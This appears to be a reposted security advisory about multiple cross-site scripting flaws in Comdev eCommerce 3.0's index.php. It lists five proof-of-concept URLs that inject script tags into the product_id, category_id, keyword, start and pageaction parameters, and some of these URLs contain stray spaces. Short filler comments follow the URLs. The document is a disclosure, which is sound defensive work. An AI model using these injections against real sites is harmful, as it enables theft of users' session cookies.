source: http://www.securityfocus.com/bid/12382/info
Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as other attacks.
Comdev eCommerce 3.0 is reported prone to these issues. It is likely that previous versions are vulnerable as well.
index.php?product_id=477&pageactionprev=viewpricelist&sta rt=0"><script>alert(document.domain);</script>&category_id=&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id="><script>alert(document.d omain);</script>&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id=&keyword="><script>alert(document.domain);</script>
index.php?pageac tion=viewpricelist"><script>alert(document.domain);</script>
index.php?product_id=477"><script>alert(document.domain);</script>&pageactionprev=viewpricelist&start=0&cate gory_id=&keyword=
![图片[1]-Comdev eCommerce 3.0 – ‘index.php’ Multiple Cross-Site Scripting Vulnerabilities-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png)
CVE编号
![图片[2]-Comdev eCommerce 3.0 – ‘index.php’ Multiple Cross-Site Scripting Vulnerabilities-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png)
CNNVD-ID
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666